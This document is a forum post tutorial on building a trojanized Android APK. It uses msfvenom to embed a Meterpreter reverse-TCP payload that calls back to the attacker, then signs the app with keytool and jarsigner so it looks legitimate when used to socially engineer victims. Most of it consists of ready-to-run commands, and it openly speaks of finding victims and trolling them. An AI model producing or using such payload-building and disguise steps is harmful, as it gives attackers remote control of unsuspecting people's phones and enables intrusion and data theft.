As @pry0cc insisted that I create a post on how I manually signed a apk file in my post. As requested, here it is. Although please see this link here which is the reference that I used for my so called 1337 hax. Before I begin, what you’ll need is:
- Metasploit
- Msfvenom
- Payload
- keytool
- jarsigner
- A brain (please)
#Generating apk file
The first step is of course generating the apk file with meterpreter embedded in the file, of course any payload is usable, but I used the payload; android/meterpreter/reverse_tcp with lport 8080 and my external IP address. The command I used was:
msfvenom -p android/meterpreter/reverse_tcp lhost=127.0.0.1 lport=8080 > z.apk
Simple enough?
Of course you could try to just social engineer the apk file as it is, but I found that if you sign the apk file it is more “realistic”, but of course it is your choice.
#Signing apk file
There are two tools you’ll need, Keytool and Jarsigner. The first step is generating the keystore. When I did this, I didn’t change much for the command used. Why? It was late and I really didn’t care that much.
Anyways, the command used was:
keytool -genkey -v -keystore my-release-key.Keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000
the command is pretty self explanatory.
Now it is time to sign the apk file using this command:
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.Keystore APPNAME.apk aliasname
Again, modify the flags as need be.
Of course, you could just verify the apk file with this command:
jarsigner -verify -verbose -certs APPNAME.apk
but I took the risk without checking the apk file because I’m a 1337 haxor.
And that’s it.
#Conclusion
Of course without having a victim it isn’t fun doing all this sooo hard work. I gotta admit, this is lazy and a skid move, but when it comes to SE, it works almost all the time if you do it right. I do not recommend you to use meterpreter unless you are trolling like I do and this will not work on those that are intelligent enough. I recommend your very own coded reverse shell above all else like these tut that @0x00pf wrote which helped me out a lot to learn about reverse shells. Thank you!
Anyways, I think that basically wraps everything up at least for now and I hope this does clear up some confusion and some doubts.
Cheers!